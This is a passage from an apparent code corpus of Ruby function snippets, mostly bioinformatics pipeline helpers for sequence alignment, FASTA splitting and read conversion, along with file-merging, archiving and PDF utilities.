\n\t\t\t\t\telse\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tanchor_left, anchor_right = nil\n\t\t\t\tfirstline = TRUE\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found anchor pairs.\"\t\t\n\t\tinput_hash\n\tend",
"def get_bam_files\n\n bam_files = self.study_files.by_type('BAM')\n bams = []\n\n bam_files.each do |bam_file|\n next unless bam_file.has_completed_bundle?\n\n bams << {\n 'name' => bam_file.name,\n 'url' => bam_file.api_url,\n 'indexUrl' => bam_file.study_file_bundle.bundled_file_by_type('BAM Index')&.api_url,\n 'genomeAssembly' => bam_file.genome_assembly_name,\n 'genomeAnnotation' => bam_file.genome_annotation\n }\n end\n bams\n end",
"def single_ucf_file_lists\n File.open(single_bad_ucf_file, 'a') do |mergedfile|\n Dir.glob(\"#{output_directory_path}*name.txt\").each do |file|\n File.foreach(file) do |line|\n mergedfile.write(line)\n end\n end\n end\n end",
"def blast_permutations! fastas, blast_dbs, cpus=4\n file_permutations = one_way_combinations fastas, blast_dbs, true\n file_permutations = file_permutations.select do |f1, f2|\n genome_from_fname(f1) != genome_from_fname(f2)\n end\n\n first_files = file_permutations.map(&:first)\n second_files = file_permutations.map(&:last)\n\n first_genomes = first_files.map do |fname|\n ary = fname.split(\".\")\n ary.take(ary.length - 1).join\n end\n\n second_genomes = second_files.map do |fname|\n ary = fname.split(BLAST_DB_SEPARATOR).take(1)\n AbortIf.abort_unless ary.length == 1,\n \"Bad file name for #{fname}\"\n\n ary = ary.first.split(\".\")\n\n File.basename ary.take(ary.length - 1).join\n end\n\n outf_names = first_genomes.zip(second_genomes).map do |f1, f2|\n \"#{f1}____#{f2}.aai_blastp\"\n end\n\n args = first_files.length.times.map do |idx|\n [first_files[idx], second_files[idx], outf_names[idx]]\n end\n\n Parallel.each(args, in_processes: cpus) do |infiles|\n query = infiles[0]\n db = infiles[1]\n out = infiles[2]\n\n cmd = \"diamond blastp --threads 1 --outfmt 6 \" +\n \"--query #{query} --db #{db} --out #{out} \" +\n \"--evalue #{EVALUE_CUTOFF}\"\n\n Process.run_and_time_it! \"Diamond blast\", cmd\n end\n\n outf_names\n end",
"def merge_shards(coverage_result_filenames)\n final_result = {}\n\n # collapse results from each shard in each file\n coverage_results = coverage_result_filenames.sort.flat_map do |result_filename|\n result_file = JSON.parse(IO.read(result_filename))\n result_file.values.map {|shard| shard['coverage'] }\n end\n\n # process each result\n puts \"CoverageEnforcer: Merging #{coverage_results.size} result shards...\"\n coverage_results.each_with_index do |result, result_index|\n result.keys.each do |filename|\n lines = result[filename]['lines']\n if !final_result.has_key?(filename)\n final_result[filename] = { 'lines' => lines }\n next\n end\n\n # merge\n existing_lines = final_result[filename]['lines']\n if existing_lines.size != lines.size\n puts \"CoverageEnforcer: WARNING, line length does not match for #{filename}\"\n end\n existing_lines.each_with_index do |existing_line, line_index|\n if existing_line.nil? && !lines[line_index].nil? || !existing_line.nil? && lines[line_index].nil?\n puts \"CoverageEnforcer: WARNING, one line is nil but the other is not for #{filename}\"\n end\n if !lines[line_index].nil?\n debug \" L#{line_index+1} += #{lines[line_index]}\"\n final_result[filename]['lines'][line_index] += lines[line_index]\n end\n end\n end\n end\n final_result\n end",
"def seqshash_to_fastafile(seqs,filename)\n oa = Bio::Alignment::OriginalAlignment.new(seqs)\n string_to_file(oa.output(:fasta),filename)\n\n end",
"def grouped(files); end",
"def fitFiles(target)\n buckets()\n runningSize = 0\n fileSet = FileSet.new(target, @log, @DEBUG, @LOG_DEBUG)\n \n # Go thru each bucket...\n @sortedBuckets.each do |bkt|\n Utils.printMux(@log, \"Processing bucket '#{bkt}'\")\n\n # ... And each file in the bucket\n @data[bkt].each do |file| \n Utils.printMux(@log, \"\\tProcessing file '#{file}'\")\n\n # The regular call to size won't work with larger (> 2 GB) files in some versions of Ruby, so call the custom version added above.\n fsize = File.size_big(file)\n\n Utils.printMux(@log, \"\\t\\t fsize: #{fsize}\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n Utils.printMux(@log, \"\\t\\trunningSize: #{runningSize}\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n Utils.printMux(@log, \"\\t\\t target: #{target}\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n\n\t\t\t # Sanity check the file size\n if (fsize < 0)\n Utils.printMux(@log, \"\\t\\t*** WARNING: fsize < 0 - skipping!\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n next\n end\n\n # Make sure this file won't push us over the limit\n if (fsize + runningSize) < target\n # take the first file in this bucket \n Utils.printMux(@log, \"\\t\\tAdding '#{file}' and removing from bucket\")\n fileSet.add(file, fsize)\n runningSize += fsize\n \n # Remove the file from the original list\n @data[bkt].delete(file)\n \n # See if we should remove the bucket, too\n if @data[bkt].size() == 0\n @data.delete(bkt)\n Utils.printMux(@log, \"Removed bucket '#{bkt}'\\n\")\n end\n else\n # Go to the next bucket and look at smaller files\n Utils.printMux(@log, \"\\t\\tDropping down to next bucket\\n\")\n break\n end\n\n # Give the CPU a bit of a break in between files\n sleep @sleepInterval\n end # iterate files\n\n # Give the CPU a bit of a break in between buckets\n sleep @sleepInterval\n end # iterate buckets\n \n # Save off the running size in the object\n @totalSize = runningSize\n \n # Save off the file set\n @fileSets << fileSet\n\n Utils.printMux(@log, \"totalSize: #{totalSize}\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n Utils.printMux(@log, \"fileSets:\\n\" + @fileSets.pretty_inspect(), @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n\n return fileSet\n end",
"def combine_pdf_files\n create_process(process: \"COMBINE_PDF_FILES\")\n end",
"def unmerge(*files)\n files.each do |f|\n f = check_for_file(f)\n @unmerged << f\n end\n end",
"def convert_alignment(args={})\n i, o = args[:in], args[:out]\n \n ff = Bio::FlatFile.auto(i).to_a\n aln = Bio::Alignment.new(ff)\n File.open(o, 'w') do |o|\n o.write aln.output :phylip\n end\n \nend",
"def align(ref, ref_base, software, opts = {})\n if software == :tophat\n bt_flag =\n opts[:tophat_aligner] == :bowtie1 ? '--bowtie1' : ''\n gap_flag =\n opts[:mismatches] < 2 ? \"--read-gap-length #{opts[:mismatches]}\" : ''\n end\n\n aln_cmd = {\n bowtie1:\n 'bowtie' \\\n \" --seedlen=#{opts[:seedlen]} #{ref_base}\" \\\n \" --un=#{@names.get('fp')}\" \\\n \" -q #{@names.get('trim')} \" \\\n \" --sam #{@names.get('ncrna')}\",\n bowtie2:\n 'bowtie2' \\\n \" --un #{@names.get('fp')}\" \\\n \" -x #{ref_base}\" \\\n \" -L #{opts[:seedlen]}\" \\\n \" -U #{@names.get('trim')}\" \\\n \" -S #{@names.get('ncrna')}\",\n bwa:\n 'bwa mem' \\\n \" -k #{opts[:seedlen]}\" \\\n \" #{ref} \" \\\n \" #{@names.get('trim')} \" \\\n \"| samtools view -b - > #{@names.get('ncrna')} \" \\\n '&& bam2fastq' \\\n \" -o #{@names.get('fp')}\" \\\n \" --no-aligned #{@names.get('ncrna')}\",\n tophat:\n 'tophat' \\\n \" --read-edit-dist #{opts[:mismatches]}\" \\\n \" #{bt_flag}\" \\\n \" -N #{opts[:mismatches]}\" \\\n \" --output-dir #{@names.get('topout')}\" \\\n ' --no-novel-juncs' \\\n \" #{gap_flag}\" \\\n \" --GTF #{opts[:annotation]}\" \\\n \" #{ref_base} #{@names.get('fp')}\",\n star:\n 'STAR' \\\n \" --genomeDir #{ref_base}\" \\\n \" --outFilterMismatchNmax #{opts[:mismatches]}\" \\\n \" --readFilesIn #{@names.get('fp')}\"\\\n \" --outFileNamePrefix #{@names.get('mapped_all')}\"\n }\n\n target =\n opts[:seedlen].nil? ? @names.get('mapped_all') : @names.get('fp')\n run_cmd(aln_cmd[software]) unless skip_step?(target, 'aligning')\n [@names.get('mapped_all'), @names.get('unmapped')]\n end",
"def multistamp(primary_file, stamp_file, output); end",
"def archive\n files.each do |path|\n path_obj = Pathname.new(path)\n path_name = path_obj.dirname.to_s\n compress = Kellerkind::Compress.new(:target_path => out,\n :source_path => path,\n :tarball_prefix => path_obj.basename.to_s)\n compress.find_at_source_path = true\n if File.exists?(path)\n Kellerkind::Process.verbose(:start_compressing)\n compress.gzip\n if File.exists?(\"#{path_name}/#{compress.tarball_name}\")\n Kellerkind::Process.verbose(:finished_compressing)\n FileUtils.mv(\"#{path_name}/#{compress.tarball_name}\",\n \"#{out}/#{compress.tarball_name}\")\n FileUtils.rm_rf(path)\n FileUtils.touch(path) if self.recreate\n end\n end\n end\n end",
"def bundle_files(files)\n output = \"\"\n files.select { |f| !f.content.empty? }.each do |file|\n content = file.content\n path = file.path\n output << bundled_file_header(path) \n output << include_imported_files(content, path) if file.type[:ext] == 'css'\n content << javascript_fix if file.type[:ext] == '.js' \n output << content\n output << bundled_file_footer(path)\n end\n output\n end",
"def make_blastdbs! fnames, cpus=4\n suffix = BLAST_DB_SUFFIX\n outfiles = fnames.map { |fname| fname + suffix }\n\n Parallel.each(fnames, in_processes: cpus) do |fname|\n cmd = \"diamond makedb --threads 1 --in #{fname} \" +\n \"--db #{fname}#{BLAST_DB_SUFFIX}\"\n\n Process.run_and_time_it! \"Make db\", cmd\n end\n\n outfiles\n end",
"def sort_multiple(output, files, key)\n output_file = \"#{output}.sorted\"\n @headers = []\n @content = []\n files.each do |file|\n @content_as_table = parse(file)\n @headers = @content_as_table.headers if @headers.empty?\n @index_of_key = @headers.index(key)\n @content += @content_as_table.to_a.drop(1)\n end\n @content = @content.sort_by { |a| -a[@index_of_key].to_i }\n write(@content, @headers, output_file)\n output_file\n end",
"def mergeGbkSeq\n \nend",
"def merge_table_files\n merged_table_file = intermediate(\"Workbook tables\")\n worksheets do |name,xml_filename|\n log.info \"Merging table files for #{name}\"\n worksheet_table_file = input([name, \"Worksheet tables\"])\n worksheet_table_file.each_line do |line|\n merged_table_file.puts line\n end\n close worksheet_table_file\n end\n close merged_table_file\n end",
"def union(b)\n b.each do |bf|\n af = @cfile_by_name[bf.file]\n if af\n af.union bf\n else\n @cfile_by_name[bf.file] = bf\n end\n end\n self\n end",
"def merge_records(merger, output)\n contents = []\n flag = true\n while flag\n begin\n record = merger.next\n headers = record.keys if headers.nil?\n contents << record\n rescue StopIteration\n flag = false\n break\n end\n end\n file_name = output.gsub('.txt', '')\n output_file = file_name + '.txt.audited'\n write(contents, headers, output_file)\n end",
"def merge(into_file)\n raise Error::Argument, \"No files to merge\" if self.to_a.empty?\n if self.count > 1\n Utility.system_quietly('mp3wrap', into_file, *self.to_a)\n written = File.join(into_file.dir, \"#{File.basename(into_file.path, '.*') }_MP3WRAP.mp3\")\n FileUtils.mv(written, into_file)\n else\n FileUtils.cp(self.first, into_file)\n end\n self.file(into_file.path)\n end",
"def merge(*files)\n @paths[''].merge *files\n end",
"def genenate_average_files\n puts 'genenate_average_files'\n @data.each do |e|\n final = get_avg(e)\n puts \"#{e[0]} #{final}\"\n File.open(e[0].to_s, 'w') do |file|\n file.puts(\"#{e[0]}, #{final}\")\n end\n end\n end",
"def merge(*args)\n options = Hash === args.last ? args.pop : {}\n files = to_artifacts(args)\n rake_check_options options, :path\n raise ArgumentError, \"Expected at least one file to merge\" if files.empty?\n path = options[:path] || @path\n expanders = files.collect do |file|\n @sources << proc { file.to_s }\n expander = ZipExpander.new(file)\n @actions << proc do |file_map, transform_map|\n file.invoke() if file.is_a?(Rake::Task)\n expander.expand(file_map, transform_map, path)\n end\n expander\n end\n Merge.new(expanders)\n end",
"def by_file(first, output)\n qseq = Bio::Ngs::Converter::Qseq.new(options.paired ? :pe : :se)\n buffers = [first] if first.kind_of? String\n buffers = first if first.kind_of? Array\n buffers.each do |file_name|\n qseq.buffer = File.open(file_name,'r') #todo: dir is not used here it could be a bug\n fastq_file = File.open(File.join(options.dir,\"#{output}.fastq\"), (options.append ? 'a' : 'w'))\n qseq.to_fastq do |fastq|\n fastq_file.puts fastq if fastq\n end\n qseq.buffer.close\n fastq_file.close \n #Write the report\n File.open(File.join(options.dir,\"#{output}.stats\"), (options.append ? 'a' : 'w')) do |file|\n file.puts ({:file_name=>file_name, :stats=>qseq.stats}.to_yaml)\n end\n end #buffers\n # puts \"Done #{file_name}\"\n end",
"def mp3wrap_merge(mp3s, output_file_name, path)\n mp3wrap_path = `which mp3wrap`.chomp\n\n `#{ mp3wrap_path } #{ path }#{ output_file_name } #{ mp3s }`\nend",
"def process\n outs = []\n @infiles.each do |f|\n if f.instance_of? Hash\n dat = f[:block].(f[:file])\n if dat.instance_of? String\n out << dat + \"\\n\\n\"\n else\n fail TypeError, \"#{dat.class} returned, String expected\"\n end\n elsif f.instance_of? String\n outs << File.read(f)\n elsif f.instance_of? Array\n outs << f.map { |fn| File.read(fn) }\n else\n fail TypeError, \"Infile #{f.inspect} is not a hash nor a string nor an array!\"\n end\n end\n out = outs.join(\"\\n\\n\")\n if @block\n out = @block.(out)\n end\n if @outfile\n File.delete(@outfile) if File.exist? @outfile\n File.open(@outfile, 'w') do |f|\n f.write(out)\n end\n end\n out\n end",
"def command_to_merge_files(tool, input)\n p \"#{ tool } #{ input }\"\nend",
"def merge_names(*args)\n\tnames = {}\n\targs.each do |arg|\n\t\tFile.open(arg,'r') do |f|\n\t\t\twhile line = f.gets do\n\t\t\t\tnames[line.delane_sequence_name] = true\n\t\t\tend\n\t\tend\n\tend\n\tnames\nend",
"def split_input filename, pieces\n input = {}\n name = nil\n seq=\"\"\n sequences=0\n output_files=[]\n if pieces > 1\n File.open(filename).each_line do |line|\n if line =~ /^>(.*)$/\n sequences+=1\n if name\n input[name]=seq\n seq=\"\"\n end\n name = $1\n else\n seq << line.chomp\n end\n end\n input[name]=seq\n # construct list of output file handles\n outputs=[]\n pieces = [pieces, sequences].min\n pieces.times do |n|\n outfile = \"#{filename}_chunk_#{n}.fasta\"\n outfile = File.expand_path(outfile)\n outputs[n] = File.open(\"#{outfile}\", \"w\")\n output_files[n] = \"#{outfile}\"\n end\n # write sequences\n count=0\n input.each_pair do |name, seq|\n outputs[count].write(\">#{name}\\n\")\n outputs[count].write(\"#{seq}\\n\")\n count += 1\n count %= pieces\n end\n outputs.each do |out|\n out.close\n end\n else\n output_files << filename\n end\n output_files\n end",
"def concatinate(f1, f2)\n\t\tDir.foreach(\"#{f1}\") do |x0|\n\t\t\tnext if x0 == '.' or x0 == '..' or x0.start_with?('.')\n\t\t\tDir.foreach(\"#{f2}\") do |x1|\n\t\t\t\tnext if x1 == '.' or x1 == '..' or x1.start_with?('.')\n\t\t\t\t\n\t\t\t\t# concatenate x and y \t\t\n \t\t\t\tsystem(\"cat #{f1}/#{x0} #{f2}/#{x1} > t1/#{x0}#{x1}\")\n\t\t\t\t# compress concatenated files\n \t\t\t\tsystem(\"7za a -t7z t2/#{x0}#{x1}.7z t1/#{x0}#{x1}\")\n \t \t\t#system(\"7za a -t7z -mx9 -mmt2 -ms4g -m0=lzma:d128m:fb256 t2/#{x0}#{x1}.7z t1/#{x0}#{x1}kd\")\n \t \t\t\n \t \tend \n \t end\t\t\n\tend",
"def merge_files(files, to, &blk)\n File.moves_to_merge(files, to).each do |move|\n continue = true\n continue = yield(move) if block_given?\n break unless continue\n mv_p move[:from], move[:to]\n end\n end",
"def find_blat_out_candidate_reads\n\t\tputs \"step 4 find blat out candidate reads\"\n\t\tblat_out_candidate_reads(\n\t\t\tfiles.keys.sort.collect{|k| \"chopped_#{k}lane.psl \" },\n\t\t\tfiles.keys.sort.collect{|k| \"#{k}lane.fa \" },\n\t\t\tfiles.keys.sort.collect{|k| \"04_blat_out_candidate_#{k}lane.fa\" })\n\n#\t\tcommand = \"blatoutcandidate.rb \"\n#\t\t#\tfiles is a hash and the keys are not guaranteed to be sorted\n#\t\t#\tsort alphabetically and left is first, right is last (conveniently)\n#\t\tfiles.keys.sort.each{|k| command << \"chopped_#{k}lane.psl \" } #\tNON-HUMAN matches\n#\t\tfiles.keys.sort.each{|k| command << \"#{k}lane.fa \" } #\traw reads input\n#\t\tcommand.execute\n##\n##\tblatoutcandidate.pl ALWAYS creates ... blat_out_candidate_#{k}lane.fa\n##\tI REALLY don't like that. So much inconsistancy. Will overwrite existing.\n##\n##\tTODO wrote my own version of blatoutcandidate so could change this\n##\n#\t\tfiles.each_pair { |k,v| \n#\t\t\t#\t\n#\t\t\t#\traw reads with names in the psl files.\n#\t\t\t#\t\n#\t\t\t\"blat_out_candidate_#{k}lane.fa\".file_check(die_on_failed_file_check)\n#\t\t\tFileUtils.mv( \"blat_out_candidate_#{k}lane.fa\",\n#\t\t\t\t\"04_blat_out_candidate_#{k}lane.fa\" )\t#\tNON-HUMAN matches \n#\t\t}\n\tend",
"def split_refseq\n # prepare output files\n system(%Q[cut -f4 #{$prepare_dir}/refseq_genes_result.tsv | cut -c1-5 | sort | uniq > #{$prepare_dir}/refp_prefix_list.txt ]) # get exist prefix list of protein_id\n FileUtils.mkdir_p(\"#{$prepare_dir}/refp\") unless File.exist?(\"#{$prepare_dir}/refp\")\n refp_output = {}\n File.open(\"#{$prepare_dir}/refp_prefix_list.txt\") do |f|\n f.each_line do |line|\n prefix = line.chomp.strip\n refp_output[prefix] = File.open(\"#{$prepare_dir}/refp/#{prefix}.dat\", \"w\")\n end\n end\n refp_output[\"no_protein_id\"] = File.open(\"#{$prepare_dir}/refp/no_protein_id.dat\", \"w\") # protein_id is optional\n\n File.open(\"#{$prepare_dir}/refseq_genes_result.tsv\") do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n prefix = (columns[3].nil? || columns[3] == \"\") ? \"no_protein_id\" : columns[3][0..4] # protein_id is optional\n refp_output[prefix].puts line.chomp.strip\n end\n end\n refp_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def combine_salmon\n @tpm = {}\n @counts = {}\n if @paired == 1\n @data.each_with_index do |left,i|\n name = \"#{left[:name]}-#{left[:type]}-#{left[:rep]}\"\n File.open(left[:salmon]).each do |line|\n unless line.start_with?(\"#\")\n cols = line.chomp.split(\"\\t\")\n transcript = cols[0]\n tpm = cols[2].to_f\n counts = cols[3].to_f\n @tpm[transcript] ||= {}\n @tpm[transcript][name] = tpm\n @counts[transcript] ||= {}\n @counts[transcript][name] = counts\n end\n end\n end\n elsif @paired == 2\n @data.each_with_index.each_slice(2) do |(left,i), (right,j)|\n name = \"#{left[:name]}-#{left[:type]}-#{left[:rep]}\"\n File.open(left[:salmon]).each do |line|\n unless line.start_with?(\"#\")\n cols = line.chomp.split(\"\\t\")\n transcript = cols[0]\n tpm = cols[2].to_f\n counts = cols[3].to_f\n @tpm[transcript] ||= {}\n @tpm[transcript][name] = tpm\n @counts[transcript] ||= {}\n @counts[transcript][name] = counts\n end\n end\n end\n end\n File.open(\"#{@output_dir}/combined_tpm.csv\", \"wb\") do |out|\n out.write \"transcript\"\n @tpm[@tpm.keys.first].each do |file, tpm|\n out.write \"\\t#{file}\"\n end\n out.write \"\\n\"\n @tpm.each do |transcript, hash|\n out.write \"#{transcript}\"\n hash.each do |file, tpm|\n out.write \"\\t#{tpm}\"\n end\n out.write \"\\n\"\n end\n end\n File.open(\"#{@output_dir}/combined_counts.csv\", \"wb\") do |out|\n out.write \"transcript\"\n @counts[@counts.keys.first].each do |file, counts|\n out.write \"\\t#{file}\"\n end\n out.write \"\\n\"\n @counts.each do |transcript, hash|\n out.write \"#{transcript}\"\n hash.each do |file, counts|\n out.write \"\\t#{counts}\"\n end\n out.write \"\\n\"\n end\n end\n end",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped reads into fastq-format.\"\t\n\tend",
"def group_files file_data, output_path, options = {:prefix => \"L\", :suffix => \".fastq.gz\", :exclude_undetermined => true}\n\t\t\t\t# alternatively inherit the parent class and call super???? \n\t\t\t\t# super \n\t\t\t\t# \t\n groups = {}\n file_data.each do |data|\n if data[:barcode] == \"Undetermined\" and options[:exclude_undetermined]\n log \"# Undetermined sample lane: #{data[:lane]} - name: #{data[:sample_name]}. Skipping\"\n next\n end\n \n group_key = name_for_data data, options\n \n if groups.include? group_key\n if groups[group_key][:sample_name] != data[:sample_name]\n raise \"ERROR: sample names not matching #{group_key} - #{data[:path]}:#{data[:sample_name]}vs#{groups[group_key][:sample_name]}\"\n end\n if groups[group_key][:lane] != data[:lane]\n raise \"ERROR: lanes not matching #{group_key} - #{data[:path]}\"\n end\n groups[group_key][:files] << data\n else\n group_path = File.join(output_path, group_key)\n groups[group_key] = {:group_name => group_key,\n :path => group_path,\n :sample_name => data[:sample_name],\n :read => data[:read],\n :lane => data[:lane],\n :files => [data]\n }\n end\n end\n \n # sort based on read set\n groups.each do |key, group|\n group[:files] = group[:files].sort {|x,y| x[:set] <=> y[:set]}\n group[:paths] = group[:files].collect {|data| data[:path]}\n end\n groups.values\n end",
"def merge_gap_mark_tagging_import_into_content_at(options)\n gap_mark_tagging_import_base_dir = config.compute_base_dir(\n options['base-dir'] || options['base-dir-1'] || :gap_mark_tagging_import_dir\n )\n gap_mark_tagging_import_glob_pattern = config.compute_glob_pattern(\n gap_mark_tagging_import_base_dir,\n options['file-selector'] || :all_files,\n options['file-extension'] || :txt_extension\n )\n content_base_dir = config.compute_base_dir(\n options['base-dir-2'] || :content_dir\n )\n\n $stderr.puts ''\n $stderr.puts '-' * 80\n $stderr.puts 'Merging :gap_mark tokens from gap_mark_tagging_import into content_at'\n start_time = Time.now\n total_count = 0\n success_count = 0\n errors_count = 0\n\n Dir.glob(gap_mark_tagging_import_glob_pattern).each do |gap_mark_tagging_import_file_name|\n if gap_mark_tagging_import_file_name !~ /\\.gap_mark_tagging\\.txt\\z/\n next\n end\n\n total_count += 1\n # prepare paths\n content_at_file_name = gap_mark_tagging_import_file_name.gsub(\n gap_mark_tagging_import_base_dir, content_base_dir\n ).gsub(\n /\\.gap_mark_tagging\\.txt\\z/, '.at'\n )\n output_file_name = content_at_file_name\n\n begin\n outcome = Repositext::Process::Merge::GapMarkTaggingImportIntoContentAt.merge(\n File.read(gap_mark_tagging_import_file_name),\n File.read(content_at_file_name),\n )\n\n if outcome.success\n # write to file\n at_with_merged_tokens = outcome.result\n FileUtils.mkdir_p(File.dirname(output_file_name))\n File.write(output_file_name, at_with_merged_tokens)\n success_count += 1\n $stderr.puts \" + Merge :gap_marks from #{ gap_mark_tagging_import_file_name }\"\n else\n errors_count += 1\n $stderr.puts \" x Error: #{ gap_mark_tagging_import_file_name }: #{ outcome.messages.join }\"\n end\n rescue StandardError => e\n errors_count += 1\n $stderr.puts \" x Error: #{ gap_mark_tagging_import_file_name }: #{ e.class.name } - #{ e.message } - #{ e.backtrace.join(\"\\n\") }\"\n end\n end\n\n $stderr.puts \"Finished merging #{ success_count } of #{ total_count } files in #{ Time.now - start_time } seconds.\"\n $stderr.puts '-' * 80\n end",
"def alignment_strings(start=0,stop=self.length,organisms=nil) \n answer = Array.new \n self.genomic_aligns.each do |contig|\n if organisms.nil? # if no organisms were specified to limit the results\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name)) unless sequence.nil?\n else\n if organisms.include?(contig.find_organism)\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name))\n end\n end \n end\n return answer \n end",
"def process_input_seqs! fnames\n seq_lengths = {}\n clean_fnames = []\n\n fnames.each do |fname|\n clean_fname = fname + \"_aai_clean\"\n clean_fnames << clean_fname\n File.open(clean_fname, \"w\") do |f|\n Object::ParseFasta::SeqFile.open(fname).each_record do |rec|\n unless bad_seq? rec.seq\n header =\n annotate_header clean_header(rec.header),\n File.basename(fname)\n\n seq_lengths[header] = rec.seq.length\n\n f.puts \">#{header}\\n#{rec.seq}\"\n end\n end\n end\n end\n\n [seq_lengths, clean_fnames]\n end",
"def generate_alignment\n raise ArgumentError, 'Missing genome FASTA file.' unless @genome_file\n raise ArgumentError, 'Missing transcripts FASTA file.' unless @transcripts_file\n \n # Prepare the BLAT alignment\n blat = Alignment::BLAT.new(@blat_options.merge({ out_format: :tab, database: @genome_file }))\n \n # Optionally set a permanent file to write the results to\n @alignment_file ||= \"#{@transcripts_file}.alignment\"\n blat.output_file = @alignment_file\n \n puts \"Running BLAT alignment...\" if @verbose\n \n # Run\n result_file = blat.run(@transcripts_file)\n result_file.path\n end",
"def split_input filename, pieces\n input = {}\n name = nil\n seq=\"\"\n sequences=0\n File.open(filename).each_line do |line|\n if line =~ /^>(.*)$/\n sequences+=1\n if name\n input[name]=seq\n seq=\"\"\n end\n name = $1\n else\n seq << line.chomp\n end\n end\n input[name]=seq\n # construct list of output file handles\n outputs=[]\n output_files=[]\n pieces = [pieces, sequences].min\n pieces.times do |n|\n outfile = File.basename(\"#{filename}_chunk_#{n}.fasta\")\n outfile = \"#{@working_dir}/#{outfile}\"\n outputs[n] = File.open(\"#{outfile}\", \"w\")\n output_files[n] = \"#{outfile}\"\n end\n # write sequences\n count=0\n input.each_pair do |name, seq|\n outputs[count].write(\">#{name}\\n\")\n outputs[count].write(\"#{seq}\\n\")\n count += 1\n count %= pieces\n end\n outputs.each do |out|\n out.close\n end\n output_files\n end",
"def fix_adjust_merged_record_mark_positions(options)\n input_file_spec = options['input'] || 'staging_dir/at_files'\n Repositext::Cli::Utils.change_files_in_place(\n config.compute_glob_pattern(input_file_spec),\n /\\.at\\z/i,\n \"Adjusting merged :record_mark positions\",\n options\n ) do |contents, filename|\n outcome = Repositext::Fix::AdjustMergedRecordMarkPositions.fix(contents, filename)\n [outcome]\n end\n end",
"def merge!(*args)\n val = args.pop\n keys = args.flatten\n StorageFile.merge!(path, [*@parents, *keys], val)\n end",
"def create_final_contract(address, final_contract, files_to_load, table_of_contents)\n files_to_load.unshift(\"table_of_contents.pdf\")\n files_to_load.each do |file|\n\n final_contract << CombinePDF.load(file)\n end\n\n final_contract.save \"#{address}_final_contract.pdf\"\nend",
"def zipSequenceFiles()\n puts \"Zipping sequence files\"\n zipCmd = \"bzip2 *sequence.txt\"\n `#{zipCmd}`\n end",
"def zipSequenceFiles()\n puts \"Zipping sequence files\"\n zipCmd = \"bzip2 *sequence.txt\"\n `#{zipCmd}`\n end",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped.bam into fastq-format.\"\t\n\tend",
"def seed_extension(input_hash, anchor_length, read_length, fasta, output_file, mm = 1, max_overhang = read_length + 8)\n\n\t\toutput_hash = {}\n\t\n\t\tinput_hash.each do |chr_a, chromosomes|\n\t\t\t# Load reference\n\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\theader = fasta_file.gets.strip\n\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\tchromosomes.each do |chr_b, anchorpairs|\n\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n \t\t\theader = fasta_file.gets.strip\n \t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t# Loop through hash to extend seeds for each pair\n\t\t\t\tanchorpairs.each do |pair|\n\t\t\t\t\tupstream, downstream = pair\n\t\t\t\t\tqname, mate, read = upstream.id.split('_')[0..2]\n\n\t\t\t\t\tupstream.strand == 1 ? upstream_read = read : upstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\tdownstream.strand == 1 ? downstream_read = read : downstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\t\n\t\t\t\t\tup = dna_a[upstream.start - read_length + anchor_length..upstream.start + anchor_length - 1].upcase\n\t\t\t\t\tdown = dna_b[downstream.start..downstream.start + read_length - 1].upcase\t\n\t\t\t\t\n\t\t\t\t\tif upstream.strand == downstream.strand\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\n\t\t\t\t\telsif upstream.strand == 1 && downstream.strand == -1\n\t\t\t\t\t\tdown = dna_b[downstream.start - read_length + anchor_length..downstream.start + anchor_length - 1].upcase\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, 